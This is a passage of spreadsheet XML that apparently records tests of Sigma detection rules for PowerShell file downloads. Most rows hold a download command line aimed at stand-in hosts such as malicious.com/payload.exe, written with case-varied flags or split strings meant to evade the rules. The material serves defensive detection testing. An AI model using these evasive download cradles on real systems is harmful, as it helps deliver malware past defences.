      <c r="G359" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H359" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I359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59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K359" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="360" ht="15.75" customHeight="1" s="42">
      <c r="A360" s="43" t="n"/>
      <c r="B360" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C360" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D360" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E360" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMANd "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F360" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G360" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H360" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I360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60" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K360" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="361" ht="15.75" customHeight="1" s="42">
      <c r="A361" s="43" t="n"/>
      <c r="B361" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C361" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D361" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E361" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnd "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F361" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G361" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H361" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I361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61" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K361" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="362" ht="15.75" customHeight="1" s="42">
      <c r="A362" s="43" t="n"/>
      <c r="B362" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C362" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D362" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E362" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMand "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F362" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G362" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H362" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I362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362" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K362" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="363" ht="15.75" customHeight="1" s="42">
      <c r="A363" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B363" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C363" s="44" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D363" s="44" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E363" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {&amp; 'Invoke-WebRequest' -Uri [https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt) -Outfile C:\Users	haim\AppData\Local\Temp\Atomic-license.txt}</t>
        </is>
      </c>
      <c r="F363" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G363" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H363" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I363" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData (ac175779-025a-4f12-98b0-acdaeb77ea85); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J363" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K363" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="364" ht="15.75" customHeight="1" s="42">
      <c r="A364" s="43" t="n"/>
      <c r="B364" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C364" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D364" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E364" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F364" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G364" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H364" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I364" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J364" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K364" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="365" ht="15.75" customHeight="1" s="42">
      <c r="A365" s="43" t="n"/>
      <c r="B365" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C365" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D365" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E365" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F365" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G365" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H365" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I365" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J365" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K365" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="366" ht="15.75" customHeight="1" s="42">
      <c r="A366" s="43" t="n"/>
      <c r="B366" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C366" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D366" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E366" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMManD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F366" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G366" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H366" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I366" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J366" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K366" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="367" ht="15.75" customHeight="1" s="42">
      <c r="A367" s="43" t="n"/>
      <c r="B367" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C367" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D367" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E367" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F367" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G367" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H367" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I367" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J367" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K367" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="368" ht="15.75" customHeight="1" s="42">
      <c r="A368" s="43" t="n"/>
      <c r="B368" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C368" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D368" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E368" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F368" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G368" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H368" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I368" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J368" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K368" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="369" ht="15.75" customHeight="1" s="42">
      <c r="A369" s="43" t="n"/>
      <c r="B369" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C369" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D369" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E369" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F369" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G369" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H369" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I369" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J369" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K369" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="370" ht="15.75" customHeight="1" s="42">
      <c r="A370" s="43" t="n"/>
      <c r="B370" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C370" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D370" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E370" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I370" s="44" t="n"/>
      <c r="J370" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K370" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="371" ht="15.75" customHeight="1" s="42">
      <c r="A371" s="43" t="n"/>
      <c r="B371" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C371" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D371" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E371" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F371" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G371" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H371" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I371" s="44" t="n"/>
      <c r="J371" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K371" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="372" ht="15.75" customHeight="1" s="42">
      <c r="A372" s="43" t="n"/>
      <c r="B372" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C372" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D372" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E372" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I372" s="43" t="n"/>
      <c r="J372" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K372" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="373" ht="15.75" customHeight="1" s="42">
      <c r="A373" s="43" t="n"/>
      <c r="B373" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C373" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D373" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E373" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I373" s="44" t="n"/>
      <c r="J373" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K373" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="374" ht="15.75" customHeight="1" s="42">
      <c r="A374" s="43" t="n"/>
      <c r="B374" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C374" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D374" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E374" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I374" s="44" t="n"/>
      <c r="J374" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K374" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="375" ht="15.75" customHeight="1" s="42">
      <c r="A375" s="43" t="n"/>
      <c r="B375" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C375" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D375" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E375" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I375" s="44" t="n"/>
      <c r="J375" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K375" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="376" ht="15.75" customHeight="1" s="42">
      <c r="A376" s="43" t="n"/>
      <c r="B376" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C376" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D376" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E376" s="43" t="inlineStr">
        <is>
          <t>powershell -c "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F376" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G376" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H376" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I376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76" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K376" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="377" ht="15.75" customHeight="1" s="42">
      <c r="A377" s="44" t="n"/>
      <c r="B377" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C377" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D377" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E377" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F377" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G377" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H377" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I37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77" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K377" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="378" ht="15.75" customHeight="1" s="42">
      <c r="A378" s="43" t="n"/>
      <c r="B378" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C378" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D378" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E378" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F378" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G378" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H378" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I378" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J378" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K378" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="379" ht="15.75" customHeight="1" s="42">
      <c r="A379" s="43" t="n"/>
      <c r="B379" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C379" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D379" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E379" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F379" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G379" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H379" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I379" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J379" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K379" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="380" ht="15.75" customHeight="1" s="42">
      <c r="A380" s="44" t="n"/>
      <c r="B380" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C380" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D380" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E380" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H380" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I380" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J380" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K380" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="381" ht="15.75" customHeight="1" s="42">
      <c r="A381" s="44" t="n"/>
      <c r="B381" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C381" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D381" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E381" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H381" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I381" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J381" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K381" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="382" ht="15.75" customHeight="1" s="42">
      <c r="A382" s="44" t="n"/>
      <c r="B382" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C382" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D382" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E382" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F382" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G382" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H382" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I382" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J382" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K382" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="383" ht="15.75" customHeight="1" s="42">
      <c r="A383" s="44" t="n"/>
      <c r="B383" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C383" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D383" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E383" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H383" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I383" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J383" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K383" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="384" ht="15.75" customHeight="1" s="42">
      <c r="A384" s="44" t="n"/>
      <c r="B384" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C384" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D384" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E384" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnD "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F384" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G384" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H384" s="44" t="b">
        <v>0</v>
      </c>
